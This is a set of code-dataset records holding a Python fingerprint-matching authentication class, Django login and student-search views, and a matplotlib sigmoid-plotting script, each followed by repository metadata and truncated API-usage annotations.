10501857645 | import os
from aiohttp import Fingerprint
import cv2
from matplotlib import pyplot as plt
from Matcher import *
from random import *
# Authentication class will serve as an authenticator for one person
class Authentication:
    """Authenticates one probe fingerprint image against a small, randomly
    sampled database of enrolled ("Real") images.

    Typical flow: create_random_authentication_database() ->
    create_match_dict() -> get_prediction().
    """
    def __init__(self, probe_img, data_path, folder, threshold=0.6):
        self.probe_img = probe_img                # probe image file name
        self.genuine_scores = []                  # normalized scores of accepted attempts
        self.impostor_scores = []                 # normalized scores of rejected attempts
        self.authentication_database = []         # sampled enrolled image names
        self.data_path = data_path                # e.g. "Dataset"
        self.folder = folder                      # e.g. "Probe"
        self.match_dictionary = {}                # image name -> raw match score
        self.threshold = threshold                # accept/reject cut-off in [0, 1]
    def create_random_authentication_database(self) -> None:
        """Sample 5 random images from <data_path>/Real into the database.

        Note: sampling is with replacement, so duplicates are possible
        (preserved from the original behavior).
        """
        real_img_path = os.path.join(self.data_path, "Real")
        real_img_file_names = os.listdir(real_img_path)
        for _ in range(5):
            random_idx = randint(0, len(real_img_file_names) - 1)
            self.authentication_database.append(real_img_file_names[random_idx])
    def create_match_dict(self) -> None:
        """Score the probe image against every database image.

        Fills self.match_dictionary with image name -> SIFT/FLANN match
        score.  The probe is expected under
        <data_path>/<folder>/<prefix>/<probe_img>, where <prefix> is the
        part of the file name before the first underscore.
        """
        probe_img_folder = self.probe_img.split("_")[0]
        database_path = os.path.join(self.data_path, 'Real')
        probe_path = os.path.join(self.data_path, self.folder,
                                  probe_img_folder, self.probe_img)
        probe_image = cv2.imread(probe_path)
        for image_description in self.authentication_database:
            real_image = cv2.imread(
                os.path.join(database_path, image_description))
            matcher = Matcher(real_image, probe_image)
            self.match_dictionary[image_description] = \
                matcher.get_sift_flann_match_score()
    def get_prediction(self) -> int:
        """Return 1 (access granted) when the best normalized match score
        exceeds the threshold, else 0; record the score in the matching
        score list.

        Previously an empty match dictionary crashed with IndexError; it
        now rejects cleanly.
        """
        if not self.match_dictionary:
            return 0  # nothing was matched at all -> reject
        # Best raw score, normalized to [0, 1] (scores come in as percents).
        best_score = max(self.match_dictionary.values()) / 100
        if best_score > self.threshold:
            print('Access Granted')
            self.genuine_scores.append(best_score)
            return 1
        self.impostor_scores.append(best_score)
        return 0
| Dorukozar/Fingerprint-Matcher-and-Evaluation | Authentication.py | Authentication.py | py | 3,865 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number"... |
6562172415 | from django.shortcuts import render,redirect
from .models import *
from django.contrib.auth import login, authenticate, logout
from django.contrib import messages
from django.db.models import Q
# Create your views here.
def login_page(request):
    """Render the sign-in page."""
    template_name = "index.html"
    return render(request, template_name)
def init_login(request):
    """Authenticate the posted credentials and open a session.

    Redirects to the search page on success; otherwise flashes an error
    and sends the user back to the login page.
    """
    submitted_username = request.POST.get("username", None)
    submitted_password = request.POST.get("password", None)
    user = authenticate(request,
                        username=submitted_username,
                        password=submitted_password)
    if user is None:
        messages.error(request, "Invalid Login Credentials")
        return redirect("searchapp:login")
    login(request, user)
    return redirect("searchapp:search")
def search_bar(request):
    """Search students by any combination of full name, school name and
    graduation year.

    Each supplied field contributes one Q condition and the conditions are
    AND-ed together — this reproduces every combination of the previous
    eight-branch if/elif ladder without the duplication.  When no field is
    supplied the template receives an empty string (not an empty queryset),
    exactly as before.
    """
    fullname = request.POST.get("fullname", None)
    school = request.POST.get("school", None)
    grad_year = request.POST.get("grad_year", None)

    conditions = []
    if fullname:
        conditions.append(Q(fullname=fullname))
    if school:
        conditions.append(Q(school__name=school))
    if grad_year:
        conditions.append(Q(year_of_grad=grad_year))

    if conditions:
        query = conditions[0]
        for condition in conditions[1:]:
            query &= condition
        student = Student.objects.filter(query)
    else:
        student = ""  # template relies on a falsy placeholder here
    context = {"student": student}
    return render(request, "searchbar.html", context)
def logout_view(request):
    """End the current session and send the user to the sign-in page."""
    destination = "searchapp:sign-in"
    logout(request)
    return redirect(destination)
| Ennyola/Search-System | searchSystem/searchApp/views.py | views.py | py | 2,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.authenticate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.login",
"line_number": 17,
"usage_type": "call"
},
{
... |
43160456317 | import numpy as np
import matplotlib.pyplot as plt
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# 01. Plain sigmoid over [-5, 5).
x = np.arange(-5., 5., 0.1)
plt.figure(0)
plt.plot(x, sigmoid(x), 'g')
plt.plot([0, 0], [1., 0.], ':')  # dotted vertical guide at x = 0
plt.title('sigmoid func')

# 02. sigmoid(a*x): the larger a is, the closer the curve gets to a step function.
plt.figure(1)
for gain, color in ((0.5, 'r'), (1.0, 'g'), (2.0, 'b')):
    plt.plot(x, sigmoid(gain * x), color)
plt.title('sigmoid func')

# 03. sigmoid(x + b): the larger b is, the further left the curve shifts
# (higher values at the same x).
plt.figure(2)
for shift, color in ((0, 'r'), (1, 'g'), (2, 'b')):
    plt.plot(x, sigmoid(x + shift), color)
plt.title('sigmoid func')
plt.show() | minssoj/Learning_Pytorch | day2/01.sigmoidFunctionEX.py | 01.sigmoidFunctionEX.py | py | 741 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.exp",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.